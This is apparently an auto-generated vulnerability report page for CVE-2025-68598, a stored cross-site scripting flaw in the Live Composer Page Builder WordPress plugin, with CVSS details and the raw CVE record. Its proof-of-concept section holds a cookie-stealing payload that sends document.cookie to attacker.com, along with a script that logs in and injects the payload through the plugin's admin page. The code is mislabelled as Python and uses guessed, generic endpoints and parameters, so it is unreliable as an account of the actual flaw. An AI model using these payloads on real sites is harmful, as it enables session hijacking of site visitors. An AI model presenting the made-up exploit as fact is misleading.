Security Vulnerability Report
中文
CVE-2025-68598 CVSS 6.5 MEDIUM

CVE-2025-68598

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:36

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiveComposer Page Builder: Live Composer live-composer-page-builder allows Stored XSS.This issue affects Page Builder: Live Composer: from n/a through <= 2.1.13.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Live Composer Page Builder (live-composer-page-builder) <= 2.1.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68598 PoC - Stored XSS in Live Composer Page Builder // Attack Vector: Inject malicious JavaScript via plugin input fields // Payload example for XSS exploitation: const xssPayload = '<script>alert(document.cookie)</script>'; // Alternative payload for cookie stealing: const cookieTheftPayload = '<img src=x onerror="fetch(`https://attacker.com/log?c=`+document.cookie)">'; // Automated exploitation example: async function exploitStoredXSS(targetUrl) { const loginUrl = targetUrl + '/wp-login.php'; const pluginAdminUrl = targetUrl + '/wp-admin/admin.php?page=live_composer'; // Step 1: Authenticate with low-privilege account await fetch(loginUrl, { method: 'POST', body: new URLSearchParams({ 'log': 'attacker_username', 'pwd': 'attacker_password', 'wp-submit': 'Log In' }) }); // Step 2: Inject XSS payload through plugin interface await fetch(pluginAdminUrl, { method: 'POST', body: new URLSearchParams({ 'action': 'save', 'content': cookieTheftPayload, 'post_id': '123' }) }); console.log('XSS payload injected successfully'); console.log('Payload will execute when victim visits affected page'); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68598", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:27.290", "lastModified": "2026-04-27T19:16:35.523", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiveComposer Page Builder: Live Composer live-composer-page-builder allows Stored XSS.This issue affects Page Builder: Live Composer: from n/a through <= 2.1.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/live-composer-page-builder/vulnerability/wordpress-page-builder-live-composer-plugin-2-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}